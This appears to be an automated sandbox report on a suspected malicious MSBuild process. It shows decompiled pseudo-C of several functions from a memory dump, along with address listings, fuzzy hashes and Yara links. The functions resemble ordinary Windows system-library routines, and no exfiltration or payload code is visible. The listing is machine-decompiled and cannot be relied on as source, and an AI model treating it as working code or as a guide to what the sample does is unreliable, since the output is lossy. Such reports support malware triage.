                                                                                                0x0116eabc
                                                                                                0x0116eabf
                                                                                                0x0116eabf
                                                                                                0x0116eaca
                                                                                                0x0116eace
                                                                                                0x0116ead0
                                                                                                0x0116eae4
                                                                                                0x0116eaeb
                                                                                                0x0116eaf0
                                                                                                0x0116eaf5
                                                                                                0x0116eb09
                                                                                                0x0116eb0d
                                                                                                0x0116eb1d
                                                                                                0x0116eb2d
                                                                                                0x0116eb38
                                                                                                0x0116eb3d
                                                                                                0x0116eb41
                                                                                                0x0116eb4a
                                                                                                0x0116eb60
                                                                                                0x0116eb4c
                                                                                                0x0116eb52
                                                                                                0x0116eb59
                                                                                                0x0116eb59
                                                                                                0x0116eb68
                                                                                                0x0116eb71
                                                                                                0x0116eb71
                                                                                                0x0116ea8d
                                                                                                0x0116ea8f
                                                                                                0x0116ea92
                                                                                                0x0116ea97
                                                                                                0x0116ea97
                                                                                                0x0116ea9b
                                                                                                0x0116ea9c
                                                                                                0x0116ea9e
                                                                                                0x0116eaa6
                                                                                                0x0116eaa6
                                                                                                0x0116eb7e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction ID: fff6ece54cc78d1780fcee249595e9437cca1fce686e8381281d70855a62d900
                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction Fuzzy Hash: 4031D4766047069BC719DF28C880AABB7ADFFC0610F044A2DF59287641DF31E815CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011269A6 Relevance: .1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E011269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x119d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L010B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01126BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E010E9980() >= 0) {
							E010C2280(_t56, 0x1198778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1198774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1198774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E010AB6F0(0x108c338, 0x108c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E010E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E010E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E010BFFB0(_t68, _t77, 0x1198778);
				}
				_pop(_t78);
				return E010EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                0x011269b5
                                                                                                0x011269be
                                                                                                0x011269c3
                                                                                                0x011269c9
                                                                                                0x011269cc
                                                                                                0x011269d1
                                                                                                0x011269d3
                                                                                                0x011269de
                                                                                                0x011269e1
                                                                                                0x011269ea
                                                                                                0x011269f6
                                                                                                0x011269fe
                                                                                                0x01126a13
                                                                                                0x01126a14
                                                                                                0x01126a15
                                                                                                0x01126a16
                                                                                                0x01126a1e
                                                                                                0x01126a26
                                                                                                0x01126a31
                                                                                                0x01126a36
                                                                                                0x01126a37
                                                                                                0x01126a40
                                                                                                0x01126a49
                                                                                                0x01126a4a
                                                                                                0x01126a53
                                                                                                0x01126a59
                                                                                                0x01126a5d
                                                                                                0x01126a5e
                                                                                                0x01126a64
                                                                                                0x01126a67
                                                                                                0x01126a6a
                                                                                                0x01126a6d
                                                                                                0x01126a70
                                                                                                0x01126a77
                                                                                                0x01126a7d
                                                                                                0x01126a86
                                                                                                0x01126a89
                                                                                                0x01126a9c
                                                                                                0x01126a9f
                                                                                                0x01126aa2
                                                                                                0x01126aa5
                                                                                                0x01126aaf
                                                                                                0x01126ab1
                                                                                                0x01126ab8
                                                                                                0x01126ab9
                                                                                                0x01126abb
                                                                                                0x01126abe
                                                                                                0x01126ac5
                                                                                                0x01126ac5
                                                                                                0x01126aaf
                                                                                                0x01126a40
                                                                                                0x01126a26
                                                                                                0x011269fe
                                                                                                0x01126ace
                                                                                                0x01126ad0
                                                                                                0x01126ad3
                                                                                                0x01126ad8
                                                                                                0x01126adf
                                                                                                0x01126adf
                                                                                                0x01126ae8
                                                                                                0x01126aef
                                                                                                0x01126aef
                                                                                                0x01126af9
                                                                                                0x01126b06

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6628e3d82630b0a57c513547127c986a3390a9b2a276f028f2eeb556f99153d7
                                                                                                • Instruction ID: 0eb674e171c166691bb14ee9584edb4db98af0fb14f9ee71c13e8f7ce9eef213
                                                                                                • Opcode Fuzzy Hash: 6628e3d82630b0a57c513547127c986a3390a9b2a276f028f2eeb556f99153d7
                                                                                                • Instruction Fuzzy Hash: 63419DB1D00219AFDB28DFAAD940BFEBBF4FF48714F14812AE955A7280DB709905CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A5210 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E010A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E010A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E010BEB70(_t54, 0x11979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E010E95D0();
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E010BEB70(_t54, 0x11979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E010EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E010BEB70(_t54, 0x11979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                0x010a5220
                                                                                                0x010a5224
                                                                                                0x01100d13
                                                                                                0x01100d16
                                                                                                0x01100d19
                                                                                                0x010a522a
                                                                                                0x010a522a
                                                                                                0x010a522d
                                                                                                0x010a522d
                                                                                                0x010a5231
                                                                                                0x010a5235
                                                                                                0x010a5239
                                                                                                0x01100d5c
                                                                                                0x01100d62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01100d6a
                                                                                                0x01100d7b
                                                                                                0x01100d7f
                                                                                                0x01100d81
                                                                                                0x01100d84
                                                                                                0x01100d95
                                                                                                0x01100d95
                                                                                                0x01100d6c
                                                                                                0x01100d71
                                                                                                0x01100d71
                                                                                                0x01100d9a
                                                                                                0x00000000
                                                                                                0x010a524a
                                                                                                0x010a524a
                                                                                                0x010a5250
                                                                                                0x01100d24
                                                                                                0x01100d35
                                                                                                0x01100d39
                                                                                                0x01100d3b
                                                                                                0x01100d3e
                                                                                                0x01100d50
                                                                                                0x01100d50
                                                                                                0x01100d26
                                                                                                0x01100d2b
                                                                                                0x01100d2b
                                                                                                0x00000000
                                                                                                0x01100d55
                                                                                                0x010a5256
                                                                                                0x010a525b
                                                                                                0x010a5265
                                                                                                0x01100da7
                                                                                                0x010a526b
                                                                                                0x010a526e
                                                                                                0x010a5272
                                                                                                0x01100db1
                                                                                                0x01100db4
                                                                                                0x01100dc5
                                                                                                0x01100dc5
                                                                                                0x010a5272
                                                                                                0x010a5278
                                                                                                0x010a527e
                                                                                                0x010a528a
                                                                                                0x010a528c
                                                                                                0x010a528d
                                                                                                0x00000000
                                                                                                0x010a5280
                                                                                                0x010a5282
                                                                                                0x010a5288
                                                                                                0x010a529f
                                                                                                0x010a5292
                                                                                                0x00000000
                                                                                                0x010a5292
                                                                                                0x00000000
                                                                                                0x010a5288
                                                                                                0x010a527e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbc7f90d210fe480aa43cf7ebd44c550413a1783a93f71fb9016cbaada995c19
                                                                                                • Instruction ID: c18da42eb76895b1cbc0e123e95b1df5d17dbf59b94fad6675bbf56301611eb7
                                                                                                • Opcode Fuzzy Hash: cbc7f90d210fe480aa43cf7ebd44c550413a1783a93f71fb9016cbaada995c19
                                                                                                • Instruction Fuzzy Hash: 9B310831651701EBCB2AAB58CC81FAE77A5FF657A0F514619F5990B1D0EBB0E800CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E3D43 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E010B7B60(0, _t61, 0x10811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E010B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L010C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                0x010e3d4c
                                                                                                0x010e3d50
                                                                                                0x010e3d55
                                                                                                0x010e3d5e
                                                                                                0x0111e79a
                                                                                                0x00000000
                                                                                                0x0111e79a
                                                                                                0x010e3d68
                                                                                                0x0111e789
                                                                                                0x010e3d9d
                                                                                                0x010e3da3
                                                                                                0x010e3daf
                                                                                                0x010e3db5
                                                                                                0x010e3dbc
                                                                                                0x010e3dc4
                                                                                                0x010e3dc9
                                                                                                0x010e3dce
                                                                                                0x0111e7ae
                                                                                                0x0111e7ae
                                                                                                0x010e3dde
                                                                                                0x010e3de2
                                                                                                0x010e3de7
                                                                                                0x010e3e0d
                                                                                                0x010e3e13
                                                                                                0x010e3e16
                                                                                                0x010e3e1e
                                                                                                0x010e3e25
                                                                                                0x010e3e28
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e3e2a
                                                                                                0x010e3e2f
                                                                                                0x010e3e37
                                                                                                0x010e3e37
                                                                                                0x00000000
                                                                                                0x010e3e37
                                                                                                0x010e3e31
                                                                                                0x00000000
                                                                                                0x010e3e31
                                                                                                0x010e3e20
                                                                                                0x010e3e20
                                                                                                0x010e3e35
                                                                                                0x00000000
                                                                                                0x010e3de9
                                                                                                0x010e3de9
                                                                                                0x010e3de9
                                                                                                0x010e3dee
                                                                                                0x010e3dfd
                                                                                                0x010e3dff
                                                                                                0x010e3e02
                                                                                                0x010e3e05
                                                                                                0x010e3e05
                                                                                                0x00000000
                                                                                                0x010e3df0
                                                                                                0x010e3de7
                                                                                                0x0111e78f
                                                                                                0x0111e794
                                                                                                0x010e3d79
                                                                                                0x010e3d84
                                                                                                0x010e3d89
                                                                                                0x010e3d8e
                                                                                                0x00000000
                                                                                                0x0111e7a4
                                                                                                0x010e3d96
                                                                                                0x010e3d9a
                                                                                                0x00000000
                                                                                                0x010e3d9a
                                                                                                0x00000000
                                                                                                0x0111e794
                                                                                                0x010e3d6e
                                                                                                0x010e3d73
                                                                                                0x00000000
                                                                                                0x0111e7b5
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e6665367904c6b29d79eaa1bd6a42e1887423d185591b9beb65dd8b44886ca1
                                                                                                • Instruction ID: 272fc656577d961dbeb1e6a4340aa9d8aa4fb87c42669b8e73a847d378899f71
                                                                                                • Opcode Fuzzy Hash: 3e6665367904c6b29d79eaa1bd6a42e1887423d185591b9beb65dd8b44886ca1
                                                                                                • Instruction Fuzzy Hash: 4731CF31A05615DFDB299F2ED445A6ABFF4FF85700B0580AAE986CF390E731D840C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DA61C Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E010DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1180220);
				E010FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1197b9c; // 0x0
				_t55 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E010FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1197b10 =  *0x1197b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x119536c; // 0x77e15368
					if( *_t51 != 0x1195368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1195368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x119536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E010DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                0x010da61c
                                                                                                0x010da61e
                                                                                                0x010da623
                                                                                                0x010da628
                                                                                                0x010da62b
                                                                                                0x010da62d
                                                                                                0x010da648
                                                                                                0x010da64a
                                                                                                0x010da64f
                                                                                                0x01119b44
                                                                                                0x010da6ec
                                                                                                0x010da6f1
                                                                                                0x010da6f1
                                                                                                0x010da655
                                                                                                0x010da657
                                                                                                0x010da65a
                                                                                                0x010da65d
                                                                                                0x010da662
                                                                                                0x010da663
                                                                                                0x010da667
                                                                                                0x010da668
                                                                                                0x010da66d
                                                                                                0x010da706
                                                                                                0x010da706
                                                                                                0x01119bda
                                                                                                0x01119be6
                                                                                                0x01119beb
                                                                                                0x00000000
                                                                                                0x01119beb
                                                                                                0x010da679
                                                                                                0x01119b7a
                                                                                                0x00000000
                                                                                                0x01119b7a
                                                                                                0x010da683
                                                                                                0x010da6f4
                                                                                                0x010da6f7
                                                                                                0x010da6f9
                                                                                                0x010da6fd
                                                                                                0x010da6a0
                                                                                                0x010da6a0
                                                                                                0x010da6ad
                                                                                                0x010da6af
                                                                                                0x010da6b4
                                                                                                0x01119ba7
                                                                                                0x01119bac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01119bc6
                                                                                                0x01119bce
                                                                                                0x01119bd1
                                                                                                0x01119bd3
                                                                                                0x01119bd3
                                                                                                0x00000000
                                                                                                0x01119bd1
                                                                                                0x010da6bd
                                                                                                0x010da6c3
                                                                                                0x010da6c6
                                                                                                0x010da6d2
                                                                                                0x010da701
                                                                                                0x010da704
                                                                                                0x00000000
                                                                                                0x010da704
                                                                                                0x010da6d4
                                                                                                0x010da6d6
                                                                                                0x010da6d9
                                                                                                0x010da6db
                                                                                                0x010da6e1
                                                                                                0x010da6e6
                                                                                                0x010da6e8
                                                                                                0x010da6e8
                                                                                                0x010da6ea
                                                                                                0x00000000
                                                                                                0x010da6ea
                                                                                                0x010da688
                                                                                                0x010da692
                                                                                                0x010da694
                                                                                                0x010da699
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010da69d
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c78f48d76fe94eaccf56ebaba167d0315e131ee4c57b7b15c9dd9f3295d9e00
                                                                                                • Instruction ID: bd08a0612839e8427b74654a10705140124669e6cc6632b65d2776781e7d186a
                                                                                                • Opcode Fuzzy Hash: 2c78f48d76fe94eaccf56ebaba167d0315e131ee4c57b7b15c9dd9f3295d9e00
                                                                                                • Instruction Fuzzy Hash: 29415B75A00309DFCB19CF58C890B9DBBF2BF49304F1581A9E965AB344C775A941CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CC182 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E010CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E010C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01178D34(_v8, _t80);
					}
					E010C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E010BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01178833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E010BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E010EB180();
						if(_a4 != 0) {
							E010C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E010CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E010CBB2D(_t16, _t15);
						E010CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E010BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E010BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E010BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                0x010cc18d
                                                                                                0x010cc18f
                                                                                                0x010cc191
                                                                                                0x010cc19b
                                                                                                0x010cc1a0
                                                                                                0x010cc1d4
                                                                                                0x010cc1de
                                                                                                0x01112d6e
                                                                                                0x010cc1e4
                                                                                                0x010cc1e4
                                                                                                0x010cc1e4
                                                                                                0x010cc1ec
                                                                                                0x01112d7d
                                                                                                0x01112d7d
                                                                                                0x010cc1f3
                                                                                                0x010cc1ff
                                                                                                0x01112d88
                                                                                                0x01112d8d
                                                                                                0x01112d94
                                                                                                0x01112d94
                                                                                                0x01112d9f
                                                                                                0x01112da4
                                                                                                0x01112dab
                                                                                                0x01112db0
                                                                                                0x01112db2
                                                                                                0x01112db3
                                                                                                0x01112db4
                                                                                                0x01112dbc
                                                                                                0x01112dc3
                                                                                                0x01112dc3
                                                                                                0x010cc205
                                                                                                0x010cc205
                                                                                                0x010cc208
                                                                                                0x010cc20e
                                                                                                0x010cc211
                                                                                                0x010cc216
                                                                                                0x010cc219
                                                                                                0x010cc21f
                                                                                                0x010cc222
                                                                                                0x010cc22c
                                                                                                0x010cc234
                                                                                                0x010cc23a
                                                                                                0x010cc23f
                                                                                                0x010cc245
                                                                                                0x010cc24b
                                                                                                0x010cc251
                                                                                                0x010cc25a
                                                                                                0x010cc276
                                                                                                0x010cc27d
                                                                                                0x010cc27d
                                                                                                0x010cc25c
                                                                                                0x010cc25c
                                                                                                0x00000000
                                                                                                0x010cc25e
                                                                                                0x010cc1a4
                                                                                                0x010cc1aa
                                                                                                0x010cc1b3
                                                                                                0x010cc265
